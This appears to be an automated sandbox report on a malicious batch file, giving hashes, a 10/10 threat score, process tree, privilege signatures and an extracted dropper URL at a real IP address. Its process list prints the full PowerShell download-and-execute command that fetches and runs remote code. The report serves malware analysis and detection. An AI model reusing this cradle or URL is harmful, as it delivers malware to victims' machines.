Analysis
-
max time kernel
146s -
max time network
89s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
12-07-2020 22:10
Static task
static1
Behavioral task
behavioral1
Sample
f012b64a4c409c683d9fb217954bb81e.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
f012b64a4c409c683d9fb217954bb81e.bat
Resource
win10v200430
windows10_x64
0 signatures
0 seconds
General
-
Target
f012b64a4c409c683d9fb217954bb81e.bat
-
Size
220B
-
MD5
3630e6bfeceaf5ae9f0fe776b8146e0b
-
SHA1
233dfd6ce74130dd5c4fea4cfde910b51544c5fd
-
SHA256
4af01116ea53d684aab434e8d65d4fd28822df7f13ada9a7a0a80c8f188fdf9e
-
SHA512
677811903d0bb197ccd3a66b02c1b5c14cd9956cc7668fa8ead565b25941ba3531bc00b6aebbdfc8a3a600bd318f0c1e5fe80c7f421243c6f3c068f81b7ef62a
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/f012b64a4c409c683d9fb217954bb81e
Signatures
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
cmd.exedescription pid process target process PID 3544 wrote to memory of 516 3544 cmd.exe powershell.exe PID 3544 wrote to memory of 516 3544 cmd.exe powershell.exe PID 3544 wrote to memory of 516 3544 cmd.exe powershell.exe -
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 920 516 WerFault.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
WerFault.exedescription pid process Token: SeRestorePrivilege 920 WerFault.exe Token: SeBackupPrivilege 920 WerFault.exe Token: SeDebugPrivilege 920 WerFault.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
Processes:
WerFault.exepid process 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe 920 WerFault.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\f012b64a4c409c683d9fb217954bb81e.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/f012b64a4c409c683d9fb217954bb81e');Invoke-CSLQTFNOIPZFU;Start-Sleep -s 10000"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 7043⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/516-0-0x0000000000000000-mapping.dmp
-
memory/516-2-0x0000000000000000-mapping.dmp
-
memory/516-3-0x0000000000000000-mapping.dmp
-
memory/516-5-0x0000000000000000-mapping.dmp
-
memory/516-4-0x0000000000000000-mapping.dmp
-
memory/516-6-0x0000000000000000-mapping.dmp
-
memory/516-7-0x0000000000000000-mapping.dmp
-
memory/920-1-0x0000000004B90000-0x0000000004B91000-memory.dmpFilesize
4KB
-
memory/920-8-0x00000000051C0000-0x00000000051C1000-memory.dmpFilesize
4KB